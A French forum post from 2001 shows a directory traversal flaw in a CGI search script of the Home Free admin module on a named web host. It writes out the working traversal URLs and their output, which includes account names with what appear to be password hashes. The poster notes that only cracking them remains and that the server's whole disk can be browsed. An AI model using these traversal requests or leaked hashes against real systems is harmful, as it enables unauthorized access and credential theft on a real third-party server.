[ Page d'accueil | Sommaire | Recherche | Nouveau | Répondre | Suivant | Précédent | Remonter ]
De: Passant
Date: 04 Jan 2001
Time: 22:29:53
Remote Name: 194.230.8.52
La mise à jour de programme est très important car elle permet de corriger les bug. Le problème est qu'une mise à jour réclame du temp....
Exemple: http://www.securityfocus.com/vdb/?id=921
levillage.com blabla hebergeur de site web. Le module d'aministration s'appel Home Free, il se trouve qu'un des scripts cgi de ce module est défectueux et qu'il permet de lister les repertoire et de voir une partie du contenu d'un fichier. PROOF OF CONCEPT->
http://levillage.org/cgi-bin/search.cgi blabla => Browse sites by Alphabetical order. parametre: http://levillage.org/cgi-bin/search.cgi?letter=test
We are sorry, the system is down at the moment, please try again later Thank you To help us correct this problem, please let maire@levillage.org of the error. Error: can not open /home/httpd/cptweb/members/accounts/test -- No such file or directory Et hop voila la structure du site web
Lister le dossier cgi-bin
http://levillage.org/cgi-bin/search.cgi?letter=../../../cgi-bin ET hop la liste de quelque script present dans le dossier.
Home Free Enregistre le nom de l'administrateur dans le dossier racine du site web et que le script retourne une partie du contenu des fichiers....qui sait
http://levillage.org/cgi-bin/search.cgi?letter=../../../../httpd A web site by admin:NMmBOKd0xnHbE A web site by pascal:jMRFFVCHeGcps => cyber => 2 minutes
A ben..c pas terrible. reste plus qu'a cracker tous ça..
Il est possible de parcourir tous le disque dur du serveur tant que les fichiers présent dans le dossier peuvent être lu.